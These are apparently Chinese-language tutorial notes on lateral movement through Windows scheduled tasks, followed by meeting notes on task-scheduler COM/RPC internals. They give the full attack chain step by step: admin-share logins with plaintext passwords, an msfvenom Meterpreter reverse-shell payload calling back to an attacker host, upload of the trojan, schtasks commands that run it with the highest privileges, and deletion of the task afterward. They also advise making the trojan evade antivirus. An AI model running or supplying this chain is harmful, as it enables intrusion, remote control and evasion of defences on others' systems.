视频教程: 横向移动手法介绍
拓扑图
执行的命令 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 net user administrator 123456 net user administrator qwe123! net use \\192.168.123.67\admin$ /user :"administrator" 123456 win10提示:服务器没有配置远程管理的功能 win2008 命令成功完成 net use \\192.168.123.24\admin$ /user :"administrator" qwe123! net time \\192.168.123.24 提示服务尚未启动 at \\192.168.123.24 生成木马 handler -H 192.168.123.138 -P 4444 -p windows/meterpreter/reverse_tcp msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.123.138 LPORT=4444 -f exe -o payload.exe 上传木马 xcopy C:\Users\whale\Desktop\p\0404.exe \\192.168.123.24\admin$\temp\ 调整字符集 chcp 437 创建计划任务 schtasks /create /s 192.168.123.24 /u "administrator" /p "qwe123!" /RL HIGHEST /F /tn "todayfive" /tr "C:/Windows/temp/0404.exe" /sc once /st 17:03 :00 设置无论用户是否登陆,都执行计划任务 run whether user is logged on or not schtasks /create /s 192.168.123.24 /u "administrator" /p "qwe123!" /RL HIGHEST /F /tn "todayfive" /tr "C:/Windows/temp/0404.exe" /sc once /st 17:03 :00 /NP 查看帮助 schtasks /create /? 执行计划任务 schtasks /run /tn todayfive /s 192.168.123.24 /U "administrator" /P "qwe123!" 查看运行状态 schtasks /query /s 192.168.123.24 /U "administrator" /P "qwe123!" | findstr "todayfive" 删除 schtasks /delete /F /tn todayfive /s 192.168.123.24 /U " administrator" /P "qwe123!"
在远程的目标机器上创建计划任务
被动密码搜集的方式
指定计划任务执行的时间
exe免杀木马
注意:
win7以后使用schtasks命令,之前使用at命令
应用场景:快速横向移动拿权限用的。
非稳定控制的方式。需要自行免杀绕过av。
拿到权限就删掉计划任务
中文系统要调整字符集
2022.5.27 《关于计划任务的会议纪要》 一:计划任务API 计划任务的本质是xml 微软提供的计划任务是披着COM/DCOM皮的纯RPC COM的简单用法,是什么 :直接调用RegisterTask
之前在做什么,直接抄别人的代码 天天用impacket,就是不去看源码 二:UAC? RPC: 函数约定式调用(c) COM;面向对象(C++)封装
com基础:CLSID clsid一般指类标识符 代理模式
计划任务横向移动: 它的通信是加密的
武器化缺点
脱离实战照本宣科抄代码
什么是武器? 实战中不能掉链子 默认的缺点:1. 只有插电源的时候才启动计划任务 2. 默认一个计划任务只能跑3天
com和rpc的区别是什么? DCOM和RPC的区别是什么 不要在不会、不了解的情况下,看不起传统的东西,而去追逐热点。